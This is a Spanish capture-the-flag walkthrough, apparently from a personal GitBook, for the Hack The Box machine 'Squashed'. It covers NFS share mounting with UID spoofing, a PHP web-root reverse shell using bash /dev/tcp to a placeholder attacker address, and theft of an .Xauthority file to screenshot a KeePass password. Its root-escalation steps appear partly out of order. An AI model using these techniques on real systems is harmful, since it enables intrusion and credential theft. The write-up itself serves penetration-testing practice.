🛰️
Config-17 Space
  • 1️⃣Introducción
  • 👨‍💻¿Quien soy?
  • 👨‍🎓Recomendaciones de cursos y formación
  • 🤖Máquinas
    • 📦Hack The Box
      • 👨‍🏫Introducción a HTB
      • 🐧HTB Linux
        • Easy
          • 🏳️Irked
          • 🏳️Squashed
          • 🏳️OpenAdmin
          • 🏳️Late
          • 🏳️Teacher
        • Medium
          • 🏁Investigation
          • 🏁BroScience
      • 🪟HTB Windows
        • Easy
          • 🏳️Bastion
          • 🏳️Artic
          • 🏳️Active
          • 🏳️Optimum
          • 🏳️Granny
          • 🏳️Grandpa
          • 🏳️Devel
        • Medium
          • 🏁Fuse
          • 🏁Jeeves
      • ♨️HTB Other OS
        • 🏁Schooled
    • 💻Máquinas Locales
      • 🥷Metasploitable 2
      • 🐝Bee Box bWAPP
      • 🕸️DVWA
Con tecnología de GitBook
En esta página
  • 1. Enumeración y descubrimiento
  • 2. Explotación
  • 3. Escalada de privilegios Root

¿Te fue útil?

  1. Máquinas
  2. Hack The Box
  3. HTB Linux
  4. Easy

Squashed

AnteriorIrkedSiguienteOpenAdmin

Última actualización hace 2 años

¿Te fue útil?

Datos
Notas

Nombre de la máquina:

IP de la máquina:

10.10.11.191

Sistema simulado:

Servicio vulnerado:

CVEs:

1. Enumeración y descubrimiento

Comenzamos la fase de enumeración de la máquina Squashed realizando una petición mediante nmap a la IP desplegada buscando la información necesaria para comenzar. Comenzamos:

nmap -sC -sV -sT 10.10.11.191 -p-

En este punto vemos varios servicios, un ssh en el puerto 22, un http en el puerto 80, un RPC en el 111 y un nfs en el 2049. En este punto vamos a acceder al http para ver que servicio está desplegado.

A priori en la web no encontramos nada que nos llame la atención, pese a que existe un apartado de login al cual no se puede acceder y que parece que es el típico apartado no montado que tienen algunas páginas de máquinas en HTB.

Como tenemos un puerto NFS abierto en el 2049 vamos a probar a usar showmount y montar los directorios que tengan, si es que tienen alguno.

Como hemos descubierto estos directorios vamos a intentar montarlos en nuestra máquina, en el directorio mnt. 

mkdir /mnt/ross_folder && mkdir /mnt/web_folder
mount -t nfs 10.10.11.191:/home/ross /mnt/ross_folder -o nolock
mount -t nfs 10.10.11.191:/var/www/html /mnt/web_folder -o nolock

En este punto podremos intentar acceder a los directorios que hemos montado en nuestro equipo. Cuando intentamos acceder a /mnt/ross_folder tenemos el contenido de la carpeta sin muchos problemas e incluso vemos un fichero de Keepass que nos llama la atención a primera instancia.

El problema viene cuando intentamos acceder a /mnt/webfolder y nos aparece que no tenemos permisos para acceder al contenido aunque podemos listar parte del mismo.

Aunque comprobamos los permisos del directorio webshare y descubirmos que tiene el userid 2017, por lo que tenemos margend e maniobra.

2. Explotación

En este punto para intentar acceder a la carpeta crearemos un usuario y lo añadiremos al grupo e id 2017 y cambiaremos a él. 

useradd [Usuario]
usermod -u 2017 [Usuario]
sudo groupmod -g 2017 [Usuario]

En este punto podremos acceder al directorio y nos aprovecharemos para elaborar una revershell la cual podamos ejecutar apuntando a nuestra máquina consiguiendo acceso a la de HTB.

<?php system("bash -c 'bash -i &>/dev/tcp/[IP]/[PORT] <&1'");?>

Una vez creado el archivo simplemente lo ejecutaremos en la ruta del navegador consiguiendo la conexión desde nuestro netcat.

En este punto habremos conseguido una bash con el usuario alex en la máquina de HTB y podremos ver la flag del usuario sin problemas.

3. Escalada de privilegios Root

Al parecer este fichero almacena la sesión del usuario que se encontraba en ross_folder por lo cual probablemente sea el usuario ross u otro el cual nos permita escalar privilegios. Para explotar este usuario lo que vamos a hacer es pasar este archivo e intentar usarlo para iniciar sesión en el keepass. Observamos que el usuario tiene el UID 1001 por lo que repetimos los pasos realizados anteriormente con el usuario galletas y asignamos ese UID a un nuevo usuario.

En este punto deberemos de pasar el fichero .Xauthority a /tmp y levantar un servidor python en esa carpeta para compartirlo.

cat /mnt/ross_folder/.Xauthority | base64 > /tmp/xauth
cd /tmp && python3 -m http.server
wget http://[IP]:8000/xauth

En este punto nos habremos descargado el archivo authority y tendremos que ponerlo en nuestra variable de entorno para poder utilizarlo.

export XAUTHORITY=/tmp/.Xauthority

Si no consigues pasar bien el archivo Xauthority tendrás errores de "no protocol specified" ya que no podrás ver la pantalla. Ten cuidado al pasarlo ya que es crucial para resolverlo.

En este punto ya solo debemos de ejecutar xwd de manera que se nos genera una captura de pantalla cuando abramos el archivo de la pass y tengamos una captura de keepass.

xwd -root -screen -silent -display :0 > /tmp/screen.xwd

Cuando hayamos conseguido acceso con el permiso instalado al hacer la captura de la pantalla nos aparecerá esta captura con la cual tendriamos acceso como root.

En este momento iniciamos root en la máquina y accedemos a la flag finalizando la máquina.

Llegado este punto tenemos que intentar escalar de privilegios del usuario alex a root. Para ello el archivo de keepass puede que sea interesante, pero no tenemos la contraseña para desbloquearlo por lo que tenemos que intentar acceder. Se nos ocurre usar keepass2john pero no tenemos mucho éxito. Revisando la carpeta /mnt/ross_folder nos encontramos con el archivo .Xauthority el cual parece interesante y sobre el que encontramos algo de en internet.

Si te he ayudado sígueme y apóyame en

🤖
📦
🐧
🏳️
información
Hack The Box
Squashed